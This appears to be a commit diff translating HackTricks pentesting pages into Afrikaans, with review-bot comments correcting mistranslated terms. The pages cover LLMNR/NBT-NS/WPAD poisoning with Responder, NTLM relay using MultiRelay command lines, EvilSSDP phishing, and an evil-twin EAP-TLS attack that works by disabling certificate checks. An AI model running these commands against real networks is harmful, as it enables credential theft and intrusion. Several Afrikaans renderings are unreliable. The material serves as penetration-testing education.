- Microsoft en ander bedryfstelsels gebruik LLMNR en NBT-NS vir plaaslike naamresolusie wanneer DNS misluk. Soortgelyk gebruik Apple- en Linux-stelsels mDNS.
- Hierdie protokolle is vatbaar vir onderskepping en vervalsing as gevolg van hul ongeagte, uitsaai-aard oor UDP.
- [Responder](https://github.com/lgandx/Responder) kan gebruik word om dienste na te boots deur vervalsde antwoorde na gasheerstelsels te stuur wat hierdie protokolle ondervra.
- Verdere inligting oor diensnabootsing met behulp van Responder is beskikbaar [hier](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
### Web Proxy Auto-Discovery Protocol (WPAD)
- WPAD allows browsers to discover proxy settings automatically.
- Discovery is facilitated via DHCP, DNS, or fallback to LLMNR and NBT-NS if DNS fails.
- Responder can automate WPAD attacks, directing clients to malicious WPAD servers.
- WPAD maak dit vir webblaaier moontlik om outomaties proksi-instellings te ontdek.
- Ontdekking word fasiliteer deur middel van DHCP, DNS, of terugval na LLMNR en NBT-NS as DNS misluk.
- Responder kan WPAD-aanvalle outomatiseer deur kliënte na skadelike WPAD-bedieners te rig.
### Responder for Protocol Poisoning
- **Responder** is a tool used for poisoning LLMNR, NBT-NS, and mDNS queries, selectively responding based on query types, primarily targeting SMB services.
- It comes pre-installed in Kali Linux, configurable at `/etc/responder/Responder.conf`.
- Responder displays captured hashes on the screen and saves them in the `/usr/share/responder/logs` directory.
- It supports both IPv4 and IPv6.
- Windows version of Responder is available [here](https://github.com/lgandx/Responder-Windows).
### Responder vir Protokolvergiftiging
- **Responder** is 'n hulpmiddel wat gebruik word vir die vergiftiging van LLMNR-, NBT-NS- en mDNS-navrae, selektief antwoord gee op navraagtipes en hoofsaaklik op SMB-dienste teiken.
- Dit is vooraf geïnstalleer in Kali Linux en kan gekonfigureer word by `/etc/responder/Responder.conf`.
- Responder vertoon gevangenome wagwoorde op die skerm en stoor dit in die `/usr/share/responder/logs`-gids.
- Dit ondersteun beide IPv4 en IPv6.
- 'n Windows-weergawe van Responder is beskikbaar [hier](https://github.com/lgandx/Responder-Windows).
#### Running Responder
- To run Responder with default settings: `responder -I <Interface>`
- For more aggressive probing (with potential side effects): `responder -I <Interface> -P -r -v`
- Techniques to capture NTLMv1 challenges/responses for easier cracking: `responder -I <Interface> --lm --disable-ess`
- WPAD impersonation can be activated with: `responder -I <Interface> --wpad`
- NetBIOS requests can be resolved to the attacker's IP, and an authentication proxy can be set up: `responder.py -I <interface> -Pv`
#### Uitvoering van Responder
- Om Responder met verstekinstellings uit te voer: `responder -I <Interface>`
- Vir meer aggressiewe ondersoek (met potensiële newe-effekte): `responder -I <Interface> -P -r -v`
- Tegnieke om NTLMv1-uitdagings/antwoorde vir makliker kraak vas te vang: `responder -I <Interface> --lm --disable-ess`
- WPAD-nabootsing kan geaktiveer word met: `responder -I <Interface> --wpad`
- NetBIOS-navrae kan na die aanvaller se IP opgelos word, en 'n outentiseringsproksi kan opgestel word: `responder.py -I <interface> -Pv`
### DHCP Poisoning with Responder
- Spoofing DHCP responses can permanently poison a victim's routing information, offering a stealthier alternative to ARP poisoning.
- It requires precise knowledge of the target network's configuration.
- Running the attack: `./Responder.py -I eth0 -Pdv`
- This method can effectively capture NTLMv1/2 hashes, but it requires careful handling to avoid network disruption.
### DHCP-vergiftiging met Responder
- Die vervalsing van DHCP-antwoorde kan 'n slagoffer se roeteringinligting permanent vergiftig en bied 'n stilistiese alternatief vir ARP-vergiftiging.
- Dit vereis presiese kennis van die konfigurasie van die teikennetwerk.
- Uitvoering van die aanval: `./Responder.py -I eth0 -Pdv`
- Hierdie metode kan effektief NTLMv1/2-wagwoorde vasvang, maar dit vereis sorgvuldige hantering om netwerkversteuring te voorkom.
### Capturing Credentials with Responder
- Responder will impersonate services using the above-mentioned protocols, capturing credentials (usually NTLMv2 Challenge/Response) when a user attempts to authenticate against the spoofed services.
- Attempts can be made to downgrade to NetNTLMv1 or disable ESS for easier credential cracking.
### Vasvang van Gelde met Responder
- Responder sal dienste naboots deur die bogenoemde protokolle te gebruik en gelde (gewoonlik NTLMv2-uitdaging/antwoord) vasvang wanneer 'n gebruiker probeer outentiseer teenoor die vervalsde dienste.
- Pogings kan aangewend word om af te gradeer na NetNTLMv1 of ESS uit te skakel vir makliker kraak van gelde.
It's crucial to note that employing these techniques should be done legally and ethically, ensuring proper authorization and avoiding disruption or unauthorized access.
Dit is van kritieke belang om daarop te let dat die gebruik van hierdie tegnieke wettig en eties moet geskied, met behoorlike magtiging en sonder versteuring of ongemagtigde toegang.
## Inveigh
Inveigh is a tool for penetration testers and red teamers, designed for Windows systems. It offers functionalities similar to Responder, performing spoofing and man-in-the-middle attacks. The tool has evolved from a PowerShell script to a C# binary, with [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) and [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) as the main versions. Detailed parameters and instructions can be found in the [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters).
Inveigh can be operated through PowerShell:
Inveigh is 'n hulpmiddel vir penetrasietoetsers en rooi-spanne, ontwerp vir Windows-stelsels. Dit bied funksionaliteite soortgelyk aan Responder, wat vervalsing en man-in-die-middel-aanvalle uitvoer. Die hulpmiddel het ontwikkel vanaf 'n PowerShell-skripsie na 'n C#-binêre, met [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) en [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) as die hoofweergawes. Gedetailleerde parameters en instruksies kan gevind word in die [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters).
Inveigh kan bedryf word deur middel van PowerShell:
```powershell
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
```
Or executed as a C# binary:
Of uitgevoer as 'n C# binêre lêer:
```bash
Inveigh.exe
```
### NTLM Relay-aanval
### NTLM Relay Attack
Hierdie aanval maak gebruik van SMB-verifikasiesessies om toegang tot 'n teikermasjien te verkry en verleen 'n stelselskulp as dit suksesvol is. Sleutelvereistes sluit in:
- Die verifiserende gebruiker moet plaaslike administratiewe toegang tot die herleide gasheer hê.
- SMB-ondertekening moet gedeaktiveer wees.
This attack leverages SMB authentication sessions to access a target machine, granting a system shell if successful. Key prerequisites include:
- The authenticating user must have Local Admin access on the relayed host.
- SMB signing should be disabled.
#### 445 Poort deurstuur en tonneling
#### 445 Port Forwarding and Tunneling
In situasies waar direkte netwerkintroduksie nie haalbaar is nie, moet verkeer op poort 445 deurgestuur en getunnel word. Hulpmiddels soos [**PortBender**](https://github.com/praetorian-inc/PortBender) help om poort 445-verkeer na 'n ander poort om te lei, wat noodsaaklik is wanneer plaaslike administratiewe toegang vir bestuurderlaaiing beskikbaar is.
In scenarios where direct network introduction isn't feasible, traffic on port 445 needs to be forwarded and tunneled. Tools like [**PortBender**](https://github.com/praetorian-inc/PortBender) help in redirecting port 445 traffic to another port, which is essential when local admin access is available for driver loading.
PortBender setup and operation in Cobalt Strike:
PortBender-opstelling en bedryf in Cobalt Strike:
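Review bot: several security terms in this hunk are mistranslated and should be fixed before merge. "Plaaslike Gasresolusieprotokolle" uses "gas" (guest) where "gasheer" (host) is meant; "ongeagte" in the LLMNR bullet does not mean unauthenticated, "ongeverifieerde" does; "gevangenome wagwoorde" and "NTLMv1/2-wagwoorde" turn hashes into passwords, which changes the technical claim, so keep "hashes" as the source does; "stilistiese alternatief" (stylistic) for "stealthier" should be "stiller" or "meer heimlike"; "Gelde" for credentials means money, while "geloofsbriewe", which this same commit uses in the SSDP page, is the right word; "PowerShell-skripsie" (thesis) should be "PowerShell-skrip"; and "teikermasjien" is a typo for "teikenmasjien". Command lines and tool names are correctly left untouched throughout.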
```bash
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
@ -95,18 +92,17 @@ beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
```
### Ander Hulpmiddels vir NTLM Relay-aanval
### Other Tools for NTLM Relay Attack
- **Metasploit**: Stel op met proksi's, plaaslike en afgeleë gasheerbesonderhede.
- **smbrelayx**: 'n Python-skrips vir die oordra van SMB-sessies en die uitvoering van opdragte of die implementering van agterdeure.
- **MultiRelay**: 'n Hulpmiddel uit die Responder-pakket om spesifieke gebruikers of alle gebruikers te oordra, opdragte uit te voer of hase te dump.
- **Metasploit**: Set up with proxies, local and remote host details.
- **smbrelayx**: A Python script for relaying SMB sessions and executing commands or deploying backdoors.
- **MultiRelay**: A tool from the Responder suite to relay specific users or all users, execute commands, or dump hashes.
Elke hulpmiddel kan gekonfigureer word om deur 'n SOCKS-proksi te werk as dit nodig is, wat aanvalle selfs met indirekte netwerktoegang moontlik maak.
Each tool can be configured to operate through a SOCKS proxy if necessary, enabling attacks even with indirect network access.
### MultiRelay-bedryf
### MultiRelay Operation
MultiRelay is executed from the _**/usr/share/responder/tools**_ directory, targeting specific IPs or users.
MultiRelay word uitgevoer vanuit die _**/usr/share/responder/tools**_ gids en teiken spesifieke IP-adresse of gebruikers.
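Review bot: in the "Ander Hulpmiddels vir NTLM Relay-aanval" list, "hase te dump" renders hashes as rabbits and "Python-skrips" is a typo; use "hashes te dump" and "Python-skrip". The same list translates "relay" as "oordra" in the bullets while the heading and the MultiRelay name keep "relay"; using one term throughout the section reads better, and since "NTLM relay" is the name of the attack, keeping "relay" is the safer choice.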
```bash
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
@ -114,35 +110,34 @@ python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
# Proxychains for routing traffic
```
Hierdie gereedskap en tegnieke vorm 'n omvattende stel vir die uitvoering van NTLM Relay-aanvalle in verskillende netwerkomgewings.
These tools and techniques form a comprehensive set for conducting NTLM Relay attacks in various network environments.
### Dwang NTLM-aantekeninge af
### Force NTLM Logins
In Windows you **may be able to force some privileged accounts to authenticate to arbitrary machines**. Read the following page to learn how:
In Windows **kan jy dalk sommige bevoorregte rekeninge dwing om te verifieer teen willekeurige masjiene**. Lees die volgende bladsy om te leer hoe:
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
{% endcontent-ref %}
## References
## Verwysings
* [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
* [https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)
* [https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)
* [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
* [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
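Review bot: the heading "Dwang NTLM-aantekeninge af" uses the noun "dwang" and "aantekeninge" (notes), so it does not say "Force NTLM Logins"; "Dwing NTLM-aanmeldings af" is the imperative the source heading has, and the body sentence below it already uses "dwing", so the heading should match. Separately, the reference list carries the intrinium.com entry twice in both the old and the new version; since the translation rewrites this block anyway, dropping the duplicate here is a free fix.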
@ -1,53 +1,53 @@
# Spoofing SSDP and UPnP Devices with EvilSSDP
# Spoofing SSDP en UPnP-toestelle met EvilSSDP
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
**Check [https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/](https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/) for further information.**
**Kyk na [https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/](https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/) vir verdere inligting.**
## **SSDP & UPnP Overview**
## **SSDP & UPnP-oorsig**
SSDP (Simple Service Discovery Protocol) is utilized for network service advertising and discovery, operating on UDP port 1900 without needing DHCP or DNS configurations. It's fundamental in UPnP (Universal Plug and Play) architecture, facilitating seamless interaction among networked devices like PCs, printers, and mobile devices. UPnP's zero-configuration networking supports device discovery, IP address assignment, and service advertising.
SSDP (Simple Service Discovery Protocol) word gebruik vir netwerkdienste-advertering en -ontdekking, wat op UDP-poort 1900 werk sonder om DHCP- of DNS-konfigurasies nodig te hê. Dit is fundamenteel in die UPnP (Universal Plug and Play) argitektuur, wat naadlose interaksie tussen netwerktoestelle soos rekenaars, drukkers en mobiele toestelle fasiliteer. UPnP se zero-configuration networking ondersteun toestelontdekking, IP-adres toewysing en diens-advertering.
## **UPnP Flow & Structure**
## **UPnP-vloei en struktuur**
UPnP architecture comprises six layers: addressing, discovery, description, control, eventing, and presentation. Initially, devices attempt to obtain an IP address or self-assign one (AutoIP). The discovery phase involves the SSDP, with devices actively sending M-SEARCH requests or passively broadcasting NOTIFY messages to announce services. The control layer, vital for client-device interaction, leverages SOAP messages for command execution based on device descriptions in XML files.
UPnP-argitektuur bestaan uit ses lae: addressing, discovery, description, control, eventing en presentation. In die begin probeer toestelle 'n IP-adres verkry of self een toewys (AutoIP). Die ontdekkingsfase behels die SSDP, waar toestelle aktief M-SEARCH-versoeke stuur of passief NOTIFY-boodskappe uitsaai om dienste aan te kondig. Die beheerlaag, wat noodsaaklik is vir kliënt-toestelinteraksie, maak gebruik van SOAP-boodskappe vir beveluitvoering gebaseer op toestelbeskrywings in XML-lêers.
## **IGD & Tools Overview**
## **IGD & Gereedskapsoorsig**
IGD (Internet Gateway Device) facilitates temporary port mappings in NAT setups, allowing command acceptance via open SOAP control points despite standard WAN interface restrictions. Tools like **Miranda** aid in UPnP service discovery and command execution. **Umap** exposes WAN-accessible UPnP commands, while repositories like **upnp-arsenal** offer an array of UPnP tools. **Evil SSDP** specializes in phishing via spoofed UPnP devices, hosting templates to mimic legitimate services.
IGD (Internet Gateway Device) fasiliteer tydelike poorttoewysings in NAT-opsette, wat bevelaanvaarding via oop SOAP-beheerpunte moontlik maak, ten spyte van standaard WAN-interfacebeperkings. Gereedskap soos **Miranda** help met UPnP-diensontdekking en beveluitvoering. **Umap** stel WAN-toeganklike UPnP-bevele bloot, terwyl opslagplekke soos **upnp-arsenal** 'n verskeidenheid UPnP-gereedskap bied. **Evil SSDP** spesialiseer in hengelary deur middel van vervalsde UPnP-toestelle, met sjablone om legitieme dienste na te boots.
## **Evil SSDP Practical Usage**
## **Praktiese Gebruik van Evil SSDP**
Evil SSDP effectively creates convincing fake UPnP devices, manipulating users into interacting with seemingly authentic services. Users, tricked by the genuine appearance, may provide sensitive information like credentials. The tool's versatility extends to various templates, mimicking services like scanners, Office365, and even password vaults, capitalizing on user trust and network visibility. Post credential capture, attackers can redirect victims to designated URLs, maintaining the deception's credibility.
Evil SSDP skep oortuigende valse UPnP-toestelle wat gebruikers manipuleer om met skynbaar egte dienste te interaksieer. Gebruikers, mislei deur die egte voorkoms, kan sensitiewe inligting soos geloofsbriewe verskaf. Die gereedskap se veelsydigheid strek tot verskeie sjablone, wat dienste soos skandeerders, Office365 en selfs wagwoordkluisse naboots, deur gebruik te maak van gebruikersvertroue en netwerk-sigbaarheid. Na die vaslegging van geloofsbriewe kan aanvallers slagoffers na aangewese URL's omskakel, terwyl die geloofwaardigheid van die misleiding behou word.
## **Mitigation Strategies**
## **Versagtingsstrategieë**
To combat these threats, recommended measures include:
Aanbevole maatreëls om hierdie bedreigings te beveg, sluit in:
- Disabling UPnP on devices when not needed.
- Educating users about phishing and network security.
- Monitoring network traffic for unencrypted sensitive data.
- Deaktiveer UPnP op toestelle wanneer dit nie nodig is nie.
- Verskaf gebruikers met opleiding oor hengelary en netwerksekuriteit.
- Monitor netwerkverkeer vir onversleutelde sensitiewe data.
In essence, while UPnP offers convenience and network fluidity, it also opens doors to potential exploitation. Awareness and proactive defense are key to ensuring network integrity.
In die essensie bied UPnP gerief en netwerk-vloeibaarheid, maar dit maak ook deure oop vir potensiële uitbuiting. Bewustheid en proaktiewe verdediging is sleutel tot die verseker van netwerkintegriteit.
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
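Review bot: three word choices in this file change the meaning and should be corrected: "hengelary" (angling) for phishing, where "uitvissing" is the established term; "omskakel" (convert) for redirecting victims to a URL, where "herlei" is meant; and "interaksieer", which is not a verb, for "interact" ("interaksie hê met"). "In die essensie" in the closing paragraph is a literal carry-over; "In wese" is the idiom. The footer block here is the older template (the "@carlospolopm" handle and "volg my") rather than the one used by the other files in this commit; it is inherited from the English source, but aligning it while the file is being rewritten avoids a second pass.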
File diff suppressed because it is too large
@ -1,76 +1,76 @@
# Evil Twin EAP-TLS
# Bose Tweeling EAP-TLS
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers vir hackers geskep is**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings tot **$100,000** te verdien!
{% embed url="https://go.intigriti.com/hacktricks" %}
At some point I needed to use the proposed solution by the post bellow but the steps in [https://github.com/OpenSecurityResearch/hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) wasn't working in modern kali (2019v3) anymore.\
Anyway, it's easy to make them work.\
You only need to download the hostapd-2.6 from here: [https://w1.fi/releases/](https://w1.fi/releases/) and before compiling again hostapd-wpe install: `apt-get install libssl1.0-dev`
Op 'n stadium moes ek die voorgestelde oplossing deur die onderstaande pos gebruik, maar die stappe in [https://github.com/OpenSecurityResearch/hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) het nie meer gewerk in moderne kali (2019v3) nie.\
In elk geval is dit maklik om hulle te laat werk.\
Jy hoef net die hostapd-2.6 van hier af te laai: [https://w1.fi/releases/](https://w1.fi/releases/) en voordat jy weer hostapd-wpe installeer, voer die volgende bevel uit: `apt-get install libssl1.0-dev`
### Analyzing and Exploiting EAP-TLS in Wireless Networks
### Analiseer en Exploiteer EAP-TLS in Draadlose Netwerke
#### Background: EAP-TLS in Wireless Networks
EAP-TLS is a security protocol providing mutual authentication between client and server using certificates. The connection is only established if both the client and the server authenticate each other's certificates.
#### Agtergrond: EAP-TLS in Draadlose Netwerke
EAP-TLS is 'n sekuriteitsprotokol wat wederkerige outentifikasie tussen klient en bediener bied deur middel van sertifikate. Die verbinding word slegs tot stand gebring as beide die klient en die bediener mekaar se sertifikate outentifiseer.
#### Challenge Encountered
During an assessment, an interesting error was encountered when using the `hostapd-wpe` tool. The tool rejected the client's connection due to the client's certificate being signed by an unknown Certificate Authority (CA). This indicated that the client did trust the fake server's certificate, pointing to lax security configurations on the client side.
#### Uitdaging Teëgekom
Tydens 'n assessering is 'n interessante fout teëgekom toe die `hostapd-wpe`-instrument gebruik is. Die instrument het die klient se verbinding afgekeur omdat die klient se sertifikaat deur 'n onbekende Sertifikaatowerheid (CA) onderteken is. Dit dui daarop dat die klient die vals bediener se sertifikaat vertrou het, wat wys op lakse sekuriteitskonfigurasies aan die klientkant.
#### Objective: Setting Up a Man-in-the-Middle (MiTM) Attack
The goal was to modify the tool to accept any client certificate. This would allow the establishment of a connection with the malicious wireless network and enable a MiTM attack, potentially capturing plaintext credentials or other sensitive data.
#### Doelwit: Opstel van 'n Man-in-die-Middel (MiTM) Aanval
Die doel was om die instrument te wysig om enige klient-sertifikaat te aanvaar. Dit sou die totstandbrenging van 'n verbinding met die kwaadwillige draadlose netwerk moontlik maak en 'n MiTM-aanval moontlik maak, wat moontlik platte tekslegitimasiebewyse of ander sensitiewe data kan vasvang.
#### Solution: Modifying `hostapd-wpe`
Analysis of the source code of `hostapd-wpe` revealed that the client certificate validation was controlled by a parameter (`verify_peer`) in the OpenSSL function `SSL_set_verify`. By changing this parameter's value from 1 (validate) to 0 (do not validate), the tool was made to accept any client certificate.
#### Oplossing: Wysiging van `hostapd-wpe`
'n Ontleding van die bronkode van `hostapd-wpe` het aan die lig gebring dat die outentifikasie van die klient-sertifikaat beheer word deur 'n parameter (`verify_peer`) in die OpenSSL-funksie `SSL_set_verify`. Deur hierdie parameter se waarde te verander van 1 (valideer) na 0 (moenie valideer nie), is die instrument gemaak om enige klient-sertifikaat te aanvaar.
#### Execution of the Attack
1. **Environment Check:** Use `airodump-ng` to monitor wireless networks and identify targets.
2. **Set Up Fake AP:** Run the modified `hostapd-wpe` to create a fake Access Point (AP) mimicking the target network.
3. **Captive Portal Customization:** Customize the login page of the captive portal to appear legitimate and familiar to the target user.
4. **De-authentication Attack:** Optionally, perform a de-auth attack to disconnect the client from the legitimate network and connect them to the fake AP.
5. **Capturing Credentials:** Once the client connects to the fake AP and interacts with the captive portal, their credentials are captured.
#### Uitvoering van die Aanval
1. **Omgewingskontrole:** Gebruik `airodump-ng` om draadlose netwerke te monitor en teikens te identifiseer.
2. **Stel Valse AP op:** Voer die gewysigde `hostapd-wpe` uit om 'n valse Toegangspunt (AP) te skep wat die teikennetwerk naboots.
3. **Aangepaste Vangnetportaal:** Pas die aantekenblad van die vangnetportaal aan om legitiem en bekend aan die teiken-gebruiker te lyk.
